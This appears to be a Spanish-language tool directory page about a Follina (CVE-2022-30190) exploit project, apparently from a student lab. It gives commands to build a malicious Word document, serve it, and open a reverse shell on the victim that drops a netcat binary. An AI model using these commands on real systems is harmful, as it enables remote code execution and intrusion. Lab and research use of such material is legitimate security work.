Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-30190 — Follina (CVE-2022-30190) es una vulnerabilidad de día cero de Microsoft Office descubierta recientemente. Es una vulnerabilidad de alta gravedad que los hackers pueden aprovechar para lanzar ataques de ejecución remota de código (RCE). | Kitploit
Herramientas/GitHubGitHub/aminetitrofine/cve-2022-30190
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso Remoto
GitHubaminetitrofine/cve-2022-30190

CVE-2022-30190

Follina (CVE-2022-30190) es una vulnerabilidad de día cero de Microsoft Office descubierta recientemente. Es una vulnerabilidad de alta gravedad que los hackers pueden aprovechar para lanzar ataques de ejecución remota de código (RCE).

Ver Repositorio
1261hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE 30190

Amine TITROFINE | 17 de diciembre de 2022


Follina (CVE-2022-30190) es una vulnerabilidad de día cero de Microsoft Office descubierta recientemente. Es una vulnerabilidad de alta gravedad que los atacantes pueden aprovechar para ejecutar código remoto (RCE). Se produce cuando se llama a MSDT mediante el protocolo URL desde una aplicación que lo invoca, como Word. Un atacante que explote esta vulnerabilidad con éxito puede ejecutar código arbitrario con los privilegios de la aplicación que lo llama. El atacante puede entonces instalar programas, ver, cambiar o eliminar datos, o crear nuevas cuentas en el contexto permitido por los derechos del usuario.

Entorno

2 máquinas virtuales :

  • Máquina atacante
    • kali-linux-2022.3-virtualbox-amd64 ( Enlace de descarga )
  • Máquina víctima
    • Windows 10 (64 bits) ( Enlace de descarga )
    • Microsoft Office 2016 Pro ( Enlace de descarga )

Exploit

root@kitploit:~
$ git clone https://gitlab.com/grenoble-inp-ensimag/Secu3A/Devoir1/CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri.git

$ cd CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri

$ python3 follina.py –r 9999

Después de ejecutar el programa follina.py, aparecerá un ( follina.doc ) que contiene un script malicioso.

Para facilitar el intercambio de archivos entre las dos máquinas virtuales, usaremos el servidor HTTP de Python.

root@kitploit:~
$ python3 –m http.server 8080

Ejemplos

Obtén una reverse shell en el puerto 9999. Nota: esto descarga un binario de netcat en la víctima y lo coloca en C:\Windows\Tasks. No elimina el binario. Esto activará las detecciones del antivirus a menos que el antivirus esté deshabilitado.

root@kitploit:~
$ python3 follina.py -r 9999

Abrir calc.exe:

root@kitploit:~
$ python3 follina.py -c "calc"
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000

Abrir notepad.exe:

root@kitploit:~
$ python3 follina.py -c "notepad"
Descargar herramienta